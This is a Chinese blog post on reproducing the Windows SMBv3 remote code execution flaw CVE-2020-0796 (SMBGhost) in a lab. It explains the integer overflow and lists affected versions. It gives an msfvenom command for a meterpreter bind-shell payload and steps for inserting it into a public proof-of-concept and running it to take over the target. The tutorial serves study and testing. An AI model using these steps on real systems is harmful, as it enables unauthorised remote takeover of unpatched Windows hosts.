CVE-2020-0796漏洞该怎么进行复现

发布时间:2021-12-28 17:20:41 作者:柒染
来源:亿速云 阅读:240

本篇文章给大家分享的是有关CVE-2020-0796漏洞该怎么进行复现,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

一、漏洞介绍

Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

影响范围:

Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)

二、漏洞复现

环境准备:

Kali系统 ip:172.16.0.27
被攻击机win10系统ip:172.16.0.29受此次漏洞影响的win10系统,并安装带python3.6.x,我这边用的是(复制下方链接可下载)ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C水4C印401036B0B1EBA64476A95F338|/      (去掉其中的水印二字)

ps:关闭defender防火墙

复现步骤:

1、查看环境情况Windows版本,按win+r,在弹出窗口中输入CVE-2020-0796漏洞该怎么进行复现

查看版本信息

CVE-2020-0796漏洞该怎么进行复现

2、使用工具检测靶机是否存在漏洞,检测工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在此漏洞

CVE-2020-0796漏洞该怎么进行复现

3、kali使用msf生成木马,并查看是否生成功msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python>exploit

CVE-2020-0796漏洞该怎么进行复现

4、下载poc,将生成的exploit.py 生成的code,替换到exploit.py的USER_PAYLOAD参数,并把参数buf改为USER_PAYLOAD。

CVE-2020-0796漏洞该怎么进行复现CVE-2020-0796漏洞该怎么进行复现

5、运行poc:python3.6 exploit.py -ip xx.xx.xx.xx (如果出现报错physical read primitive failed! 多运行几次)CVE-2020-0796漏洞该怎么进行复现

6、启动msf监听本地端口,获得靶机权限,攻击成功(run失败就多run几次)CVE-2020-0796漏洞该怎么进行复现CVE-2020-0796漏洞该怎么进行复现

以上就是CVE-2020-0796漏洞该怎么进行复现,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

推荐阅读:
  1. Nginx 解析漏洞复现
  2. Ruby On Rails漏洞cve-2019-5418复现怎么进行

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

cve-2020-0796

上一篇:OpenSSH命令注入漏洞CVE-2020-15778该如何分析

下一篇:如何使用Fabric实现自动化运维

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》